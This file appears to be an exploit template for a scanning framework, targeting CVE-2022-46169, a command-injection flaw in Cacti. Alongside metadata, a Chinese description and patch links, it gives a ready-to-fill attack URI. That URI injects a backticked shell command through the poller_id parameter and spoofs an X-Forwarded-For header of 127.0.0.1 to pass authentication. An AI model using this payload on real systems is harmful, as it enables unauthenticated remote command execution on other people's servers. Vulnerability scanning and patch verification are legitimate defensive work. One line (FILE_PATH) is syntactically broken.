CLASSNAME = 'Cacti_CVE_2022_46169'
VUL_ID = 'LDY-2022-00005943'
VUL_DATE = '2022-12-05'
CREATEDATE = '2022-12-27'
UPDATEDATE = '2022-12-27'
APP_NAME = 'Cacti'
VUL_NAME = '远程命令执行(RCE)' #漏洞名称
VUL_NUM  = 'CVE_2022_46169' #漏洞编号
CVE_NUM = 'CVE_2022_46169' #CVE编号
CNVD_NUM = '' #CNVD编号
VUL_TYPE = 'CODE_EXECUTION' # 必填，漏洞类型，参考 pocsuite3 VUL_TYPE的取值范围
POC_CATEGORY = 'EXPLOITS.WEBAPP' # 必填，漏洞分类，参考 pocsuite3 POC_CATEGORY的取值范围
SEVERITY = 'Critical' # 必填，严重等级，取值范围 Critical , High , Medium, Low
REQAUTH = 'False' # 必填，boolen值，该漏洞验证或利用是否需要先认证
FINGERPRINT_NAMES = 'Cacti' # 必填，当命中哪些指纹后，可使用该poc。列表中是指纹的名称
APP_MAIN_PORT = '80' # 必填，该应用的默认配置端口，用于快速扫描模式，若无法确认可以写80
APPVERSION = 'Cacti=v1.2.22' # 必填，漏洞影响的版本号
APPPOWERLINK = 'https://github.com/Cacti/' # 非必填，应用厂商链接
DESC = '近日360漏洞云监测到cacti官方发布公告,修复了一个存在于cacti v1.2.22版本中的命令注入漏洞,未经身份认证的攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id，来满足poller_item =POLLER_ACTION_SCRIPT_PHP条件，触发proc_open()函数，从而导致命令执行,漏洞编号:CVE-2022-46169,漏洞威胁等级:严重。'
SUGGEST = '目前Cacti官方已经在v1.2.23和v1.3.0版本修复了相关漏洞，但暂未推出正式的版本更新，建议受影响用户关注官方更新或参考官方补丁代码进行修复：https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216,https://github.com/Cacti/cacti/commit/b43f13ae7f1e6bfe4e8e56a80a7cd867cf2db52b,与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。'
HASEXP = 'True' # 必填，boolen值，是否包含exp
TARGETS = 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169' # 必填，该Poc适用的目标，string类型 https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169
SURICATA_RULES = 'local_data_ids' # 必填，suricata格式的检测规则,这里只需要填写匹配流量包关键词即可
COMMAND = ''
FILE_PATH = '#' 如果不使用file_path=传shell地址，可以使用"#"进行传参数
REFERENCES = 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf' # 非必填，漏洞相关参考链接

URI = '/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=' #payload请求uri
PAYLOAD_DATA = '1' #传入的data数据
METHOD = 'get' # request 请求方式 get、post
HEADERS = "{ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0','X-Forwarded-For': '127.0.0.1'}"
KEYWORD = 'local_data_id' #判断是否存在漏洞，匹配关键词
ATTACK_PAYLOAD_DATA = '1'
ATTACK_URI = "/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`{cmd}`" #利用payload请求uri





